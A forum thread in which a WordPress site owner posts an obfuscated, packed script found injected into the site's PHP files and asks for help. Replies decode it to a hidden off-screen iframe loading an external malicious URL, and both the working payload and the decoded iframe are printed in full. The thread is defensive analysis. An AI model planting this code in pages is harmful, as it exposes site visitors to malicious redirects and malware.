Hello and welcome to our community! Is this your first visit?
Register
Enjoy an ad free experience by logging in. Not a member yet? Register.
Results 1 to 10 of 10
  1. #1
    afa
    afa is offline
    New to the CF scene
    Join Date
    Dec 2011
    Posts
    2
    Thanks
    0
    Thanked 0 Times in 0 Posts

    What does this code mean? Involves a function(p,a,c,k,e,d)

    So I like to think I'm pretty decent with web programming, but this code has me puzzled.
    Code:
    <script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('r n(5){3 b=\'w\';3 c=h e();k(3 i=0;i<x;i++){c[b.f(i>>4)+b.f(i&u)]=t.q(i)}6(!5.s(/^[a-v-9]*$/i))o y;6(5.g%2)5=\'0\'+5;3 l=5.g;3 7=h e();3 j=0;k(3 i=0;i<l;i+=2){7[j++]=c[5.A(i,2)]}o 7.z(\'\')}6(8.m.C(\'p=d\')==-1){8.B(n(\'D\'));8.m=\'p=d\'}',40,40,'|||var||data|if|result|document|||b16_digits|b16_map|enabled|Array|charAt|length|new|||for|ll|cookie|hDcd|return|cookien|fromCharCode|function|match|String|15|f0|0123456789abcdef|256|false|join|substr|write|indexOf|3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393370783b20746f703a202d3239393470783b223e3c696672616d652077696474683d22343022206865696768743d22333022207372633d22687474703a2f2f3167323166736e32747062642e63652e6d732f692e7068703f676f3d31223e3c2f696672616d653e3c2f6469763e'.split('|'),0,{}))</script>
    I know it's evil code, I had to put it through a base 64 decode twice to get to this. But all that I'm really after is this: Is there any lingering harm on the website which had this live code? When one tries to create a link to the site (powered by WordPress, by the way) on Facebook, there is this error message:
    Code:
    Cannot modify header information - headers already sent by (output started at /home/content/xx/xxxxxxx/html/index.php(1) : eval()'d code:37) in /home/content/xx/xxxxxxx/html/wp-includes/pluggable.php on line 897
    Even though I've taken the code out from index.php and then functions.php after I spotted it there. Why is this error on FB still happening if this code cannot be found in the text files? Could there be something evil happening in the database?

    Any assistance would be most appreciated.

  • #2
    Supreme Master coder! Philip M's Avatar
    Join Date
    Jun 2002
    Location
    London, England
    Posts
    18,243
    Thanks
    203
    Thanked 2,555 Times in 2,533 Posts
    http://www.codeproject.com/KB/script...s_Decoder.aspx

    If you replace the opening eval( with document.write( ... all the code is dumped to the screen. If some of it is being interpereted as html rather than being displayed consider forcing your document.write to write between <textarea></textarea> tags.


    All advice is supplied packaged by intellectual weight, and not by volume. Contents may settle slightly in transit.
    Last edited by Philip M; 12-15-2011 at 08:52 AM.

    All the code given in this post has been tested and is intended to address the question asked.
    Unless stated otherwise it is not just a demonstration.

  • #3
    Supreme Master coder! Old Pedant's Avatar
    Join Date
    Feb 2009
    Posts
    27,118
    Thanks
    80
    Thanked 4,555 Times in 4,519 Posts
    The main point of this seems to be to try to get you to bite on some supposedly free offers.

    The big long string of hex numbers turns out to be this:
    Code:
    <div style="position: absolute; left: -1993px; top: -2994px;">
        <iframe width="40" height="30" src="http://1g21fsn2tpbd.ce.ms/i.php?go=1">
        </iframe>
    </div>
    As you can see, that creates a <div> on your page that is way off the top left edge and so is effectively invisible.

    In the <div> it drops in an <iframe> with the "poison" URL. That URL immediately takes over the entire window (that is, it loads its own content into the _top window, replacing whatever was there) and starts trying to bombard you with offers.

    Not being foolish enough to click through to some of the offers, I can't guess what else they try to do. My guess would be that they try to get you to download something that will install itself as a virus or spyware on your machine. You are welcome to find out for yourself.
    An optimist sees the glass as half full.
    A pessimist sees the glass as half empty.
    A realist drinks it no matter how much there is.

  • #4
    Supreme Master coder! Old Pedant's Avatar
    Join Date
    Feb 2009
    Posts
    27,118
    Thanks
    80
    Thanked 4,555 Times in 4,519 Posts
    The weird part of this is that the hex string there isn't even mildly encrypted. It's almost like they want people to break this open. Every other one like this I've seen, the hex values are at least encrypted with a simple substitution cipher. This one doesn't bother.
    An optimist sees the glass as half full.
    A pessimist sees the glass as half empty.
    A realist drinks it no matter how much there is.

  • #5
    Supreme Master coder! Philip M's Avatar
    Join Date
    Jun 2002
    Location
    London, England
    Posts
    18,243
    Thanks
    203
    Thanked 2,555 Times in 2,533 Posts
    Quote Originally Posted by Old Pedant View Post
    The main point of this seems to be to try to get you to bite on some supposedly free offers.
    The cheese in the mousetrap is always free!

    All the code given in this post has been tested and is intended to address the question asked.
    Unless stated otherwise it is not just a demonstration.

  • #6
    Supreme Master coder! Old Pedant's Avatar
    Join Date
    Feb 2009
    Posts
    27,118
    Thanks
    80
    Thanked 4,555 Times in 4,519 Posts
    By the by, Philip, if you *do* document.write that to the screen, it *will* drop the <div> and <iframe> in place and kablooey, you are in their hands. I seriously recommend that if you do stuff like this you inspect each character before document.write'ing it and, if it is "<", replace it with "&lt;". Which is what I did.
    An optimist sees the glass as half full.
    A pessimist sees the glass as half empty.
    A realist drinks it no matter how much there is.

  • #7
    Supreme Master coder! Philip M's Avatar
    Join Date
    Jun 2002
    Location
    London, England
    Posts
    18,243
    Thanks
    203
    Thanked 2,555 Times in 2,533 Posts
    Quote Originally Posted by Old Pedant View Post
    By the by, Philip, if you *do* document.write that to the screen, it *will* drop the <div> and <iframe> in place and kablooey, you are in their hands. I seriously recommend that if you do stuff like this you inspect each character before document.write'ing it and, if it is "<", replace it with "&lt;". Which is what I did.
    Yes, I should have mentioned that!

    All the code given in this post has been tested and is intended to address the question asked.
    Unless stated otherwise it is not just a demonstration.

  • #8
    afa
    afa is offline
    New to the CF scene
    Join Date
    Dec 2011
    Posts
    2
    Thanks
    0
    Thanked 0 Times in 0 Posts
    Thanks, Philip and Old Pedant! I had read that it was possible new pages had been added to the site if such code is implemented, but if that div is the result of the script, then perhaps not? I do wonder why I still have that FB message though with the above being removed several days ago.

  • #9
    Supreme Master coder! Old Pedant's Avatar
    Join Date
    Feb 2009
    Posts
    27,118
    Thanks
    80
    Thanked 4,555 Times in 4,519 Posts
    I don't see how it could *truly* add a new page to the site, as that would mean storing something on your server. And if you have done even a halfway decent job of locking down your server's directory, that shouldn't happen.

    What it *could* do is give the *appearance* of new pages. For example, it could locate a menu and tack on another menu item. That menu item's onclick would then be implemented via the code I showed that brings up a foreign site's window just as if it's part of your site.

    So maybe that's what it's referring to.

    But as to "that FB message"... I admit it does look like they seem to have figured a way to try to stick something in your page headers. The message results because, indeed, if you try to modify an HTML header and *ANY* if HTML tags (even the <html> tag itself) have already been sent to the browser, then you can't do so. So it sounds like their attemped hack isn't happening, but you are seeing the vestiges of it in the form of that message.
    An optimist sees the glass as half full.
    A pessimist sees the glass as half empty.
    A realist drinks it no matter how much there is.

  • #10
    Master Coder felgall's Avatar
    Join Date
    Sep 2005
    Location
    Sydney, Australia
    Posts
    6,642
    Thanks
    0
    Thanked 649 Times in 639 Posts
    The p,a,c,k,e,d function is generated by an early JavaScript compressor written by one of the top JavaScript experts. It was used quite often by major scripts up until a few years ago to make the script to be downloaded a lot smaller. Older versions of JQuery used to use it.

    In the last few years more and more people have support for HTTP 1.1 enabled and so that can be used to compress all files. This means that a minified version of a script compressed with HTTP 1.1 ends up being a smaller download than the p,a,c,k,e,d version without the need to have the JavaScript decompress itself in the browser. This effectively made p,a,c,k,e,d obsolete. Of course some people still use it simply because it conceals the code making it slightly harder to read.
    Stephen
    Learn Modern JavaScript - http://javascriptexample.net/
    Helping others to solve their computer problem at http://www.felgall.com/

    Don't forget to start your JavaScript code with "use strict"; which makes it easier to find errors in your code.


  •  

    Posting Permissions

    • You may not post new threads
    • You may not post replies
    • You may not post attachments
    • You may not edit your posts
    •